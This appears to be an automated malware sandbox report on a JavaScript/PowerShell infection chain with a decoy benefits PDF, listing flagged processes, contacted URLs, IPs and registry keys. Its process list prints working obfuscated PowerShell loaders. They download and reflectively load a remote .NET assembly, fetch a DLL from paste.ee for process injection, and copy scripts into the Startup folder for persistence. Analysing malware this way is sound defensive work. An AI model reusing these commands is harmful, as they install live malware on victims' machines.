"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 44 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://raw.gith
unknown
malicious
http://paste.ee/d/6
unknown
https://go.microsoft.co
unknown
http://paste.ee/d/6fcuVl6r.dll
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt
unknown
http://paste.ee/d/6fcuV
unknown
https://paste.ee/d/0Hqnxte
unknown
http://paste.ee/d/0
unknown
https://contoso.com/License
unknown
https://paste.ee/Ne
unknown
https://docs.rs/getrandom#nodejs-es-module-support
unknown
https://analytics.paste.ee
unknown
https://paste.ee/d/6fcuVee/d
unknown
https://paste.ee/d/6fcuVP
unknown
https://rdoge.ru/bee/config.jsonf
unknown
http://172.214.220.82/data/2x_bee.js
unknown
http://paste.ee/
unknown
http://paste.ee/d/0Hqnx
unknown
https://www.google.com
unknown
http://www.w3.
unknown
https://paste.ee:443/d/0Hqnxku
unknown
https://raw.githubusercontent.co
unknown
http://paste.ee/d/0Hqn
unknown
https://paste.ee:443/d/0Hqnxky
unknown
http://172.214.220.82/data/Benefits.pdf
unknown
http://paste.ee/d/6fcuVn
unknown
http://paste.ee/d/0Hqnx2
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://172.214.220.82/data/Benefits.pdfy
unknown
https://paste.ee:443/d/0Hqnxu
unknown
https://cdnjs.cloudflare.com
unknown
https://paste.ee/d/0Hqnxza
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.microsoft.pki/
unknown
https://secure.gravatar.com
unknown
https://paste.ee/d/6fcuV
unknown
http://nuget.org/NuGet.exe
unknown
https://paste.ee//a
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://paste.ee/9
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://paste.ee/d/0Hqnx
unknown
http://www.microsoft.
unknown
https://paste.ee/1
unknown
https://github.com/Pester/Pester
unknown
https://paste.ee:443/d/6fcuV
unknown
https://rdoge.ru/bee/config.json
unknown
http://172.214.220.82/data/2p_bee.js
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtKks;
unknown
https://raw.githubusercontent.com
unknown
http://raw.githubusercontent.com
unknown
https://analytics.paste.ee;
unknown
https://aka.ms/pscore68
unknown
https://themes.googleusercontent.com
unknown
http://172.214.220.82/data/2p_bee.jsT
unknown
There are 50 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
188.114.96.3
unknown
European Union
malicious
127.0.0.1
unknown
unknown
malicious
23.47.168.24
unknown
United States
185.199.109.133
unknown
Netherlands
172.214.220.82
unknown
United States
172.67.158.129
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileSource
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sFileAncestors
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uPageCount
